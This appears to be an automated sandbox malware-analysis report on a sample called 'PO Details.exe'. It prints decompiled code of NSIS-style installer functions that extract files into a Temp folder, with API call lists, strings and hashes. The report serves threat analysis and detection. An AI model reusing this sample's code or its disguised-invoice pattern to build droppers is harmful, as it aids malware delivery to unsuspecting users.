						__eflags = _t93 -  *0x42aa24; // 0x2bff0
						if(__eflags < 0) {
							_v12 = E004068F3(_v12, 0x416a18, _t90);
						}
						 *0x41ea18 =  *0x41ea18 + _t90;
						_t93 = _t93 - _t90;
						__eflags = _t93;
					} while (_t93 != 0);
					_t82 = 0;
					__eflags = 0;
					goto L24;
				}
			}

0x0040301d
0x00403020
0x00403023
0x00403026
0x0040302c
0x0040303d
0x00403042
0x00403055
0x0040305a
0x0040305d
0x00403063
0x00000000
0x00403065
0x00403070
0x00403076
0x00403087
0x0040308e
0x00403094
0x00403096
0x0040309b
0x0040309d
0x00403188
0x0040318a
0x0040318f
0x00403196
0x00000000
0x00000000
0x00403198
0x0040319b
0x004031bf
0x004031c4
0x004031ca
0x004031d5
0x004031da
0x004031dd
0x004031de
0x004031df
0x004031e1
0x004031e6
0x004031e9
0x004031fc
0x00403200
0x00403208
0x0040320d
0x0040320f
0x0040320f
0x0040320f
0x00403217
0x00403217
0x0040321a
0x0040321b
0x0040321b
0x0040321e
0x00403220
0x00403220
0x00403220
0x0040322a
0x00403230
0x0040323e
0x00403243
0x00000000
0x00403243
0x00000000
0x004031e9
0x004031a3
0x004031ae
0x004031b3
0x004031b5
0x00000000
0x00000000
0x004031ba
0x004031bd
0x00000000
0x00000000
0x00000000
0x004030a3
0x004030a8
0x004030ad
0x004030b1
0x004030b8
0x004030bd
0x004030bf
0x004030c1
0x004030c1
0x004030c5
0x004030ca
0x004030cc
0x004031f4
0x004031eb
0x00000000
0x004031eb
0x004030d2
0x004030d9
0x00403155
0x00403159
0x0040315d
0x00403162
0x00000000
0x00403159
0x004030e2
0x004030e7
0x004030ea
0x004030ef
0x00000000
0x00000000
0x004030f1
0x004030f8
0x00000000
0x00000000
0x004030fa
0x00403101
0x00000000
0x00000000
0x00403103
0x0040310a
0x00000000
0x00000000
0x0040310c
0x00403113
0x00000000
0x00000000
0x00403115
0x0040311b
0x00403124
0x0040312a
0x0040312d
0x0040312f
0x00403135
0x00000000
0x00000000
0x0040313b
0x0040313f
0x00403147
0x00403147
0x0040314a
0x0040314a
0x0040314d
0x0040314f
0x00403151
0x00403151
0x00000000
0x0040314f
0x00403141
0x00403145
0x00000000
0x00000000
0x00000000
0x00403163
0x00403163
0x00403169
0x00403175
0x00403175
0x00403178
0x0040317e
0x0040317e
0x0040317e
0x00403186
0x00403186
0x00000000
0x00403186

APIs

GetTickCount.KERNEL32 ref: 00403026
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\PO Details.exe,00000400,?,00000007,00000009,0000000B), ref: 00403042

Part of subcall function 00405F07: GetFileAttributesW.KERNELBASE(?,00403055,C:\Users\user\Desktop\PO Details.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405F0B
Part of subcall function 00405F07: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000007,00000009,0000000B), ref: 00405F2D

GetFileSize.KERNEL32(00000000,00000000,00444000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PO Details.exe,C:\Users\user\Desktop\PO Details.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 0040308E
GlobalAlloc.KERNELBASE(00000040,0000000B,?,00000007,00000009,0000000B), ref: 004031C4

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 0040301C
Null, xrefs: 0040310C
C:\Users\user\Desktop, xrefs: 00403070, 00403075, 0040307B
C:\Users\user\Desktop\PO Details.exe, xrefs: 0040302C, 0040303B, 0040304F, 0040306F
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004031EB
Inst, xrefs: 004030FA
soft, xrefs: 00403103
"C:\Users\user\Desktop\PO Details.exe" , xrefs: 00403015
Error launching installer, xrefs: 00403065

Memory Dump Source

Source File: 00000001.00000002.9296505845.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.9296454667.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296594572.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296649258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296907529.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296956494.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297023788.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297074741.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297168424.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297228468.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO Details.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: "C:\Users\user\Desktop\PO Details.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\PO Details.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 2803837635-920106021
Opcode ID: a52360a1b04fecb28cdb34ea46c0a5e0142df37db4d5eb2ecb020a06199e7e0c
Instruction ID: 352fdba277142773567f3d30b5bba7b1c47688a28dd7517ec43723b707c69b17
Opcode Fuzzy Hash: a52360a1b04fecb28cdb34ea46c0a5e0142df37db4d5eb2ecb020a06199e7e0c
Instruction Fuzzy Hash: CF51D331904204ABDB109FA5DD85B9E7EACEB48356F24803BF910BA2D1C77C9F418B9D

Uniqueness

Uniqueness Score: -1.00%

Function 0040644E Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 209
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 72%

			E0040644E(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t43;
				WCHAR* _t44;
				signed char _t46;
				signed int _t47;
				signed int _t48;
				short _t58;
				short _t60;
				short _t62;
				void* _t70;
				signed int _t76;
				void* _t82;
				signed char _t83;
				short _t86;
				intOrPtr _t94;
				signed int _t96;
				void* _t102;
				short _t103;
				signed int _t106;
				signed int _t108;
				void* _t109;
				WCHAR* _t110;
				void* _t112;

				_t109 = __esi;
				_t102 = __edi;
				_t70 = __ebx;
				_t43 = _a8;
				if(_t43 < 0) {
					_t94 =  *0x433edc; // 0x7b357c
					_t43 =  *(_t94 - 4 + _t43 * 4);
				}
				_push(_t70);
				_push(_t109);
				_push(_t102);
				_t96 =  *0x434f58 + _t43 * 2;
				_t44 = 0x432ea0;
				_t110 = 0x432ea0;
				if(_a4 >= 0x432ea0 && _a4 - 0x432ea0 >> 1 < 0x800) {
					_t110 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t103 =  *_t96;
					if(_t103 == 0) {
						break;
					}
					__eflags = (_t110 - _t44 & 0xfffffffe) - 0x800;
					if((_t110 - _t44 & 0xfffffffe) >= 0x800) {
						break;
					}
					_t82 = 2;
					_t96 = _t96 + _t82;
					__eflags = _t103 - 4;
					_a8 = _t96;
					if(__eflags >= 0) {
						if(__eflags != 0) {
							 *_t110 = _t103;
							_t110 = _t110 + _t82;
							__eflags = _t110;
						} else {
							 *_t110 =  *_t96;
							_t110 = _t110 + _t82;
							_t96 = _t96 + _t82;
						}
						continue;
					}
					_t83 =  *((intOrPtr*)(_t96 + 1));
					_t46 =  *_t96;
					_t47 = _t46 & 0x000000ff;
					_v8 = (_t83 & 0x0000007f) << 0x00000007 | _t46 & 0x0000007f;
					_a8 = _a8 + 2;
					_v28 = _t47 | 0x00008000;
					_v24 = _t47;
					_t76 = _t83 & 0x000000ff;
					_v16 = _t76;
					__eflags = _t103 - 2;
					_v20 = _t76 | 0x00008000;
					if(_t103 != 2) {
						__eflags = _t103 - 3;
						if(_t103 != 3) {
							__eflags = _t103 - 1;
							if(_t103 == 1) {
								__eflags = (_t47 | 0xffffffff) - _v8;
								E0040644E(_t76, _t103, _t110, _t110, (_t47 | 0xffffffff) - _v8);
							}
							L43:
							_t48 = lstrlenW(_t110);
							_t96 = _a8;
							_t110 =  &(_t110[_t48]);
							_t44 = 0x432ea0;
							continue;
						}
						_t106 = _v8;
						__eflags = _t106 - 0x1d;
						if(_t106 != 0x1d) {
							__eflags = (_t106 << 0xb) + 0x436000;
							E00406411(_t110, (_t106 << 0xb) + 0x436000);
						} else {
							E00406358(_t110,  *0x434f08);
						}
						__eflags = _t106 + 0xffffffeb - 7;
						if(_t106 + 0xffffffeb < 7) {
							L34:
							E004066C0(_t110);
						}
						goto L43;
					}
					_t86 =  *0x434f0c;
					__eflags = _t86;
					_t108 = 2;
					if(_t86 >= 0) {
						L13:
						_v8 = 1;
						L14:
						__eflags =  *0x434fa4;
						if( *0x434fa4 != 0) {
							_t108 = 4;
						}
						__eflags = _t47;
						if(__eflags >= 0) {
							__eflags = _t47 - 0x25;
							if(_t47 != 0x25) {
								__eflags = _t47 - 0x24;
								if(_t47 == 0x24) {
									GetWindowsDirectoryW(_t110, 0x400);
									_t108 = 0;
								}
								while(1) {
									__eflags = _t108;
									if(_t108 == 0) {
										goto L30;
									}
									_t58 =  *0x434f04;
									_t108 = _t108 - 1;
									__eflags = _t58;
									if(_t58 == 0) {
										L26:
										_t60 = SHGetSpecialFolderLocation( *0x434f08,  *(_t112 + _t108 * 4 - 0x18),  &_v12);
										__eflags = _t60;
										if(_t60 != 0) {
											L28:
											 *_t110 =  *_t110 & 0x00000000;
											__eflags =  *_t110;
											continue;
										}
										__imp__SHGetPathFromIDListW(_v12, _t110);
										__imp__CoTaskMemFree(_v12);
										__eflags = _t60;
										if(_t60 != 0) {
											goto L30;
										}
										goto L28;
									}
									__eflags = _v8;
									if(_v8 == 0) {
										goto L26;
									}
									_t62 =  *_t58( *0x434f08,  *(_t112 + _t108 * 4 - 0x18), 0, 0, _t110); // executed
									__eflags = _t62;
									if(_t62 == 0) {
										goto L30;
									}
									goto L26;
								}
								goto L30;
							}
							GetSystemDirectoryW(_t110, 0x400);
							goto L30;
						} else {
							E004062DF( *0x434f58, __eflags, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x434f58 + (_t47 & 0x0000003f) * 2, _t110, _t47 & 0x00000040);
							__eflags =  *_t110;
							if( *_t110 != 0) {
								L32:
								__eflags = _t76 - 0x1a;
								if(_t76 == 0x1a) {
									lstrcatW(_t110, L"\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L34;
							}
							E0040644E(_t76, _t108, _t110, _t110, _t76);
							L30:
							__eflags =  *_t110;
							if( *_t110 == 0) {
								goto L34;
							}
							_t76 = _v16;
							goto L32;
						}
					}
					__eflags = _t86 - 0x5a04;
					if(_t86 == 0x5a04) {
						goto L13;
					}
					__eflags = _t76 - 0x23;
					if(_t76 == 0x23) {
						goto L13;
					}
					__eflags = _t76 - 0x2e;
					if(_t76 == 0x2e) {
						goto L13;
					} else {
						_v8 = _v8 & 0x00000000;
						goto L14;
					}
				}
				 *_t110 =  *_t110 & 0x00000000;
				if(_a4 == 0) {
					return _t44;
				}
				return E00406411(_a4, _t44);
			}

0x0040644e
0x0040644e
0x0040644e
0x00406454
0x00406459
0x0040645b
0x0040646a
0x0040646a
0x00406472
0x00406473
0x00406474
0x00406475
0x00406478
0x00406480
0x00406482
0x0040649b
0x0040649e
0x0040649e
0x0040669a
0x0040669a
0x004066a0
0x00000000
0x00000000
0x004064ae
0x004064b4
0x00000000
0x00000000
0x004064bc
0x004064bd
0x004064bf
0x004064c3
0x004064c6
0x00406687
0x00406695
0x00406698
0x00406698
0x00406689
0x0040668c
0x0040668f
0x00406691
0x00406691
0x00000000
0x00406687
0x004064cc
0x004064cf
0x004064de
0x004064e5
0x004064ef
0x004064f3
0x004064f6
0x004064f9
0x004064fe
0x00406503
0x00406507
0x0040650a
0x0040662a
0x0040662e
0x00406661
0x00406665
0x0040666a
0x0040666f
0x0040666f
0x00406674
0x00406675
0x0040667a
0x0040667d
0x00406680
0x00000000
0x00406680
0x00406630
0x00406633
0x00406636
0x0040664b
0x00406652
0x00406638
0x0040663f
0x0040663f
0x0040665a
0x0040665d
0x00406622
0x00406623
0x00406623
0x00000000
0x0040665d
0x00406510
0x00406518
0x0040651a
0x0040651b
0x00406534
0x00406534
0x0040653b
0x0040653b
0x00406542
0x00406546
0x00406546
0x00406547
0x00406549
0x00406584
0x00406587
0x00406597
0x0040659a
0x004065a2
0x004065a8
0x004065a8
0x00406605
0x00406605
0x00406607
0x00000000
0x00000000
0x004065ac
0x004065b3
0x004065b4
0x004065b6
0x004065d0
0x004065de
0x004065e4
0x004065e6
0x00406601
0x00406601
0x00406601
0x00000000
0x00406601
0x004065ec
0x004065f7
0x004065fd
0x004065ff
0x00000000
0x00000000
0x00000000
0x004065ff
0x004065b8
0x004065bb
0x00000000
0x00000000
0x004065ca
0x004065cc
0x004065ce
0x00000000
0x00000000
0x00000000
0x004065ce
0x00000000
0x00406605
0x0040658f
0x00000000
0x0040654b
0x00406569
0x0040656e
0x00406572
0x00406612
0x00406612
0x00406615
0x0040661d
0x0040661d
0x00000000
0x00406615
0x0040657a
0x00406609
0x00406609
0x0040660d
0x00000000
0x00000000
0x0040660f
0x00000000
0x0040660f
0x00406549
0x0040651d
0x00406522
0x00000000
0x00000000
0x00406524
0x00406527
0x00000000
0x00000000
0x00406529
0x0040652c
0x00000000
0x0040652e
0x0040652e
0x00000000
0x0040652e
0x0040652c
0x004066a6
0x004066b1
0x004066bd
0x004066bd
0x00000000

APIs

GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 0040658F
GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsm89AB.tmp\System.dll,?,004054B0,Skipped: C:\Users\user\AppData\Local\Temp\nsm89AB.tmp\System.dll,00000000), ref: 004065A2
SHGetSpecialFolderLocation.SHELL32(004054B0,00425A20,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsm89AB.tmp\System.dll,?,004054B0,Skipped: C:\Users\user\AppData\Local\Temp\nsm89AB.tmp\System.dll,00000000), ref: 004065DE
SHGetPathFromIDListW.SHELL32(00425A20,Call), ref: 004065EC
CoTaskMemFree.OLE32(00425A20), ref: 004065F7
lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040661D
lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsm89AB.tmp\System.dll,?,004054B0,Skipped: C:\Users\user\AppData\Local\Temp\nsm89AB.tmp\System.dll,00000000), ref: 00406675

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 0040655F
Call, xrefs: 00406478, 00406553, 0040655A, 0040655E, 00406578, 00406579, 0040658E, 004065A1, 004065BD, 004065E8, 0040661C, 00406622, 0040663E, 00406651, 0040666E, 00406674, 00406680, 004066B3
|5{, xrefs: 0040645B
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406617
Skipped: C:\Users\user\AppData\Local\Temp\nsm89AB.tmp\System.dll, xrefs: 00406473

Memory Dump Source

Source File: 00000001.00000002.9296505845.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.9296454667.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296594572.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296649258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296907529.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296956494.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297023788.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297074741.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297168424.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297228468.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO Details.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsm89AB.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$|5{
API String ID: 717251189-3292498421
Opcode ID: 5fd5f62acfbc750a5bfa13b67a53bf5d96f1c0a3e796ecc305639f8f1b5e8061
Instruction ID: cd0f296135d024e5542a1133132ccafb23cc3a0c8fe84acec88ebf75cbd5934e
Opcode Fuzzy Hash: 5fd5f62acfbc750a5bfa13b67a53bf5d96f1c0a3e796ecc305639f8f1b5e8061
Instruction Fuzzy Hash: 9C614471A00111AADF208F54DD41BBE37A5AF44314F26853FE943B62D0EB3E5AA2CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040324C Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 166
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E0040324C(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
				signed int _v8;
				int _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				short _v152;
				void* _t65;
				long _t70;
				intOrPtr _t75;
				long _t76;
				intOrPtr _t77;
				void* _t78;
				int _t88;
				intOrPtr _t92;
				intOrPtr _t95;
				long _t96;
				signed int _t97;
				int _t98;
				int _t99;
				intOrPtr _t100;
				void* _t101;
				void* _t102;

				_t97 = _a16;
				_t92 = _a12;
				_v12 = _t97;
				if(_t92 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_v16 = _t92;
				if(_t92 == 0) {
					_v16 = 0x422a20;
				}
				_t62 = _a4;
				if(_a4 >= 0) {
					E0040347D( *0x434f78 + _t62);
				}
				if(E00403467( &_a16, 4) == 0) {
					L41:
					_push(0xfffffffd);
					goto L42;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t92 != 0) {
							if(_a16 < _t97) {
								_t97 = _a16;
							}
							if(E00403467(_t92, _t97) != 0) {
								_v8 = _t97;
								L44:
								return _v8;
							} else {
								goto L41;
							}
						}
						if(_a16 <= _t92) {
							goto L44;
						}
						_t88 = _v12;
						while(1) {
							_t98 = _a16;
							if(_a16 >= _t88) {
								_t98 = _t88;
							}
							if(E00403467(0x41ea20, _t98) == 0) {
								goto L41;
							}
							if(E00405FB9(_a8, 0x41ea20, _t98) == 0) {
								L28:
								_push(0xfffffffe);
								L42:
								_pop(_t65);
								return _t65;
							}
							_v8 = _v8 + _t98;
							_a16 = _a16 - _t98;
							if(_a16 > 0) {
								continue;
							}
							goto L44;
						}
						goto L41;
					}
					_t70 = GetTickCount();
					 *0x40d384 =  *0x40d384 & 0x00000000;
					 *0x40d380 =  *0x40d380 & 0x00000000;
					_t14 =  &_a16;
					 *_t14 = _a16 & 0x7fffffff;
					_v20 = _t70;
					 *0x40ce68 = 8;
					 *0x416a10 = 0x40ea08;
					 *0x416a0c = 0x40ea08;
					 *0x416a08 = 0x416a08;
					_a4 = _a16;
					if( *_t14 <= 0) {
						goto L44;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t99 = 0x4000;
						if(_a16 < 0x4000) {
							_t99 = _a16;
						}
						if(E00403467(0x41ea20, _t99) == 0) {
							goto L41;
						}
						_a16 = _a16 - _t99;
						 *0x40ce58 = 0x41ea20;
						 *0x40ce5c = _t99;
						while(1) {
							_t95 = _v16;
							 *0x40ce60 = _t95;
							 *0x40ce64 = _v12;
							_t75 = E00406961(0x40ce58);
							_v24 = _t75;
							if(_t75 < 0) {
								break;
							}
							_t100 =  *0x40ce60; // 0x425a20
							_t101 = _t100 - _t95;
							_t76 = GetTickCount();
							_t96 = _t76;
							if(( *0x434fd4 & 0x00000001) != 0 && (_t76 - _v20 > 0xc8 || _a16 == 0)) {
								wsprintfW( &_v152, L"... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t102 = _t102 + 0xc;
								E00405479(0,  &_v152); // executed
								_v20 = _t96;
							}
							if(_t101 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L44;
							} else {
								if(_a12 != 0) {
									_t77 =  *0x40ce60; // 0x425a20
									_v8 = _v8 + _t101;
									_v12 = _v12 - _t101;
									_v16 = _t77;
									L23:
									if(_v24 != 1) {
										continue;
									}
									goto L44;
								}
								_t78 = E00405FB9(_a8, _v16, _t101); // executed
								if(_t78 == 0) {
									goto L28;
								}
								_v8 = _v8 + _t101;
								goto L23;
							}
						}
						_push(0xfffffffc);
						goto L42;
					}
					goto L41;
				}
			}

0x00403257
0x0040325b
0x0040325e
0x00403263
0x00403265
0x00403265
0x0040326c
0x00403270
0x00403275
0x00403277
0x00403277
0x0040327e
0x00403283
0x0040328e
0x0040328e
0x004032a0
0x00403455
0x00403455
0x00000000
0x004032a6
0x004032aa
0x00403402
0x00403445
0x00403447
0x00403447
0x00403453
0x0040345a
0x0040345d
0x00000000
0x00000000
0x00000000
0x00000000
0x00403453
0x00403407
0x00000000
0x00000000
0x00403409
0x0040340c
0x0040340f
0x00403412
0x00403414
0x00403414
0x00403424
0x00000000
0x00000000
0x00403432
0x004033fc
0x004033fc
0x00403457
0x00403457
0x00000000
0x00403457
0x00403434
0x00403437
0x0040343e
0x00000000
0x00000000
0x00000000
0x00403440
0x00000000
0x0040340c
0x004032b6
0x004032b8
0x004032bf
0x004032c6
0x004032c6
0x004032cd
0x004032d5
0x004032df
0x004032e4
0x004032ec
0x004032f6
0x004032f9
0x00000000
0x00000000
0x00000000
0x00000000
0x004032ff
0x004032ff
0x004032ff
0x00403307
0x00403309
0x00403309
0x0040331a
0x00000000
0x00000000
0x00403320
0x00403323
0x00403329
0x0040332f
0x0040332f
0x0040333a
0x00403340
0x00403345
0x0040334c
0x0040334f
0x00000000
0x00000000
0x00403355
0x0040335b
0x0040335d
0x00403366
0x00403368
0x00403399
0x0040339f
0x004033ab
0x004033b0
0x004033b0
0x004033b5
0x004033f0
0x00000000
0x00000000
0x00000000
0x004033b7
0x004033bb
0x004033d2
0x004033d7
0x004033da
0x004033dd
0x004033e0
0x004033e4
0x00000000
0x00000000
0x00000000
0x004033ea
0x004033c4
0x004033cb
0x00000000
0x00000000
0x004033cd
0x00000000
0x004033cd
0x004033b5
0x004033f8
0x00000000
0x004033f8
0x00000000
0x004032ff

APIs

GetTickCount.KERNEL32 ref: 004032B6
GetTickCount.KERNEL32 ref: 0040335D
MulDiv.KERNEL32(7FFFFFFF,00000064,00000000), ref: 00403386
wsprintfW.USER32 ref: 00403399

Strings

A, xrefs: 0040330C
A, xrefs: 00403416
*B, xrefs: 00403277
... %d%%, xrefs: 00403393
ZB, xrefs: 0040333A, 00403355, 004033D2

Memory Dump Source

Source File: 00000001.00000002.9296505845.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.9296454667.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296594572.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296649258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296907529.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296956494.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297023788.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297074741.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297168424.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297228468.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO Details.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: *B$ ZB$ A$ A$... %d%%
API String ID: 551687249-3856725213
Opcode ID: 6aa008098f4ef09d38d5c59ecde741492560208fda71d4d747c9693988f45b69
Instruction ID: 934ec796fb5923f126773143cacc3683187fa16e161fba292e3b1b9e9ada072f
Opcode Fuzzy Hash: 6aa008098f4ef09d38d5c59ecde741492560208fda71d4d747c9693988f45b69
Instruction Fuzzy Hash: 44518C71D00219DBCB11DF65EA84B9E7FA8AF01756F10817BEC10BB2C1C7789A40CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E0040176F(FILETIME* __ebx, void* __eflags) {
				void* __esi;
				void* _t35;
				void* _t43;
				void* _t45;
				FILETIME* _t51;
				FILETIME* _t64;
				void* _t66;
				signed int _t72;
				FILETIME* _t73;
				FILETIME* _t77;
				signed int _t79;
				WCHAR* _t81;
				void* _t83;
				void* _t84;
				void* _t86;

				_t77 = __ebx;
				 *(_t86 - 8) = E00402D3E(0x31);
				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
				_t35 = E00405D5D( *(_t86 - 8));
				_push( *(_t86 - 8));
				_t81 = L"Call";
				if(_t35 == 0) {
					lstrcatW(E00405CE6(E00406411(_t81, L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\Susendes\\Scrumption\\Bilfragmenteringsanlgs209\\Buskmndene\\Injectors\\Cunts")), ??);
				} else {
					E00406411();
				}
				E004066C0(_t81);
				while(1) {
					__eflags =  *(_t86 + 8) - 3;
					if( *(_t86 + 8) >= 3) {
						_t66 = E0040676F(_t81);
						_t79 = 0;
						__eflags = _t66 - _t77;
						if(_t66 != _t77) {
							_t73 = _t66 + 0x14;
							__eflags = _t73;
							_t79 = CompareFileTime(_t73, _t86 - 0x24);
						}
						asm("sbb eax, eax");
						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
						__eflags = _t72;
						 *(_t86 + 8) = _t72;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) == _t77) {
						E00405EE2(_t81);
					}
					__eflags =  *(_t86 + 8) - 1;
					_t43 = E00405F07(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
					__eflags = _t43 - 0xffffffff;
					 *(_t86 - 0x38) = _t43;
					if(_t43 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) != _t77) {
						E00405479(0xffffffe2,  *(_t86 - 8));
						__eflags =  *(_t86 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t86 - 4)) = 1;
						}
						L31:
						 *0x434fa8 =  *0x434fa8 +  *((intOrPtr*)(_t86 - 4));
						__eflags =  *0x434fa8;
						goto L32;
					} else {
						E00406411("C:\Users\Arthur\AppData\Local\Temp\nsm89AB.tmp", _t83);
						E00406411(_t83, _t81);
						E0040644E(_t77, _t81, _t83, "C:\Users\Arthur\AppData\Local\Temp\nsm89AB.tmp\System.dll",  *((intOrPtr*)(_t86 - 0x1c)));
						E00406411(_t83, "C:\Users\Arthur\AppData\Local\Temp\nsm89AB.tmp");
						_t64 = E00405A77("C:\Users\Arthur\AppData\Local\Temp\nsm89AB.tmp\System.dll",  *(_t86 - 0x30) >> 3) - 4;
						__eflags = _t64;
						if(_t64 == 0) {
							continue;
						} else {
							__eflags = _t64 == 1;
							if(_t64 == 1) {
								 *0x434fa8 =  &( *0x434fa8->dwLowDateTime);
								L32:
								_t51 = 0;
								__eflags = 0;
							} else {
								_push(_t81);
								_push(0xfffffffa);
								E00405479();
								L29:
								_t51 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t51;
				}
				E00405479(0xffffffea,  *(_t86 - 8)); // executed
				 *0x434fd4 =  *0x434fd4 + 1;
				_t45 = E0040324C( *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
				 *0x434fd4 =  *0x434fd4 - 1;
				__eflags =  *(_t86 - 0x24) - 0xffffffff;
				_t84 = _t45;
				if( *(_t86 - 0x24) != 0xffffffff) {
					L22:
					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
						goto L22;
					}
				}
				CloseHandle( *(_t86 - 0x38)); // executed
				__eflags = _t84 - _t77;
				if(_t84 >= _t77) {
					goto L31;
				} else {
					__eflags = _t84 - 0xfffffffe;
					if(_t84 != 0xfffffffe) {
						E0040644E(_t77, _t81, _t84, _t81, 0xffffffee);
					} else {
						E0040644E(_t77, _t81, _t84, _t81, 0xffffffe9);
						lstrcatW(_t81,  *(_t86 - 8));
					}
					_push(0x200010);
					_push(_t81);
					E00405A77();
					goto L29;
				}
				goto L33;
			}

0x0040176f
0x00401776
0x00401782
0x00401785
0x0040178a
0x0040178d
0x00401794
0x004017b0
0x00401796
0x00401797
0x00401797
0x004017b6
0x004017bb
0x004017bb
0x004017bf
0x004017c2
0x004017c7
0x004017c9
0x004017cb
0x004017d0
